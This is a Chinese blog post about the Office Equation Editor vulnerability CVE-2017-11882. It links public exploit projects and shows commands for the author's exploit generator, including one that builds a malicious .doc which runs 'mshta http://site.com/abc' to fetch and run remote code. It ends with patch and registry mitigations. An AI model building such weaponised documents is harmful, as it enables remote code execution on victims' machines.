From:https://evi1cg.me/archives/CVE_2017_11882_exp.html
最近这段时间CVE-2017-11882挺火的。关于这个漏洞可以看看这里:http://www.freebuf.com/vuls/154462.html
今天在twitter上看到有人共享了一个POC,https://twitter.com/gossithedog/status/932694287480913920,http://owned.lab6.com/%7Egossi/research/public/cve-2017-11882/,后来又看到有人共享了一个项目https://github.com/embedi/CVE-2017-11882,简单看了一下这个项目,通过对rtf文件的修改来实现命令执行的目的,但是有个缺陷就是,这个项目使用的是使用webdav的方式来执行远程文件的,使用起来可能并不容易,所以就对此文件进行了简单的修改,具体项目地址如下:GITHUB:
https://github.com/Ridter/CVE-2017-11882/
使用方式很简单,如果要执行命令
[code]python Command_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o test.doc[/code]
关于怎么进一步利用,可以参考之前写的https://evi1cg.me/archives/remote_exec.html,由于有长度的限制,这里可以采用mshta的方式来执行。构造的命令如下:
[code]python Command_CVE-2017-11882.py -c “mshta http://site.com/abc” -o test.doc[/code]
最终效果如下:
解决方案:
1、微软已经对此漏洞做出了修复。
- 下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 更新补丁进行修补。
- 开启Windows Update功能,定期对系统进行自动更新
2、由于该公式编辑器已经17年未做更新,可能存在大量安全漏洞,建议在注册表中取消该模块的注册。
按下Win+R组合键,打开cmd.exe
对应office版本修改以下注册表路径以后,输入:
[code]reg add “HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000- 0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400
reg add “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400[/code]
主题测试文章,只做测试使用。发布者:SecMore,转转请注明出处:https://secmore.com/cve/cve-2017-11882-exp.html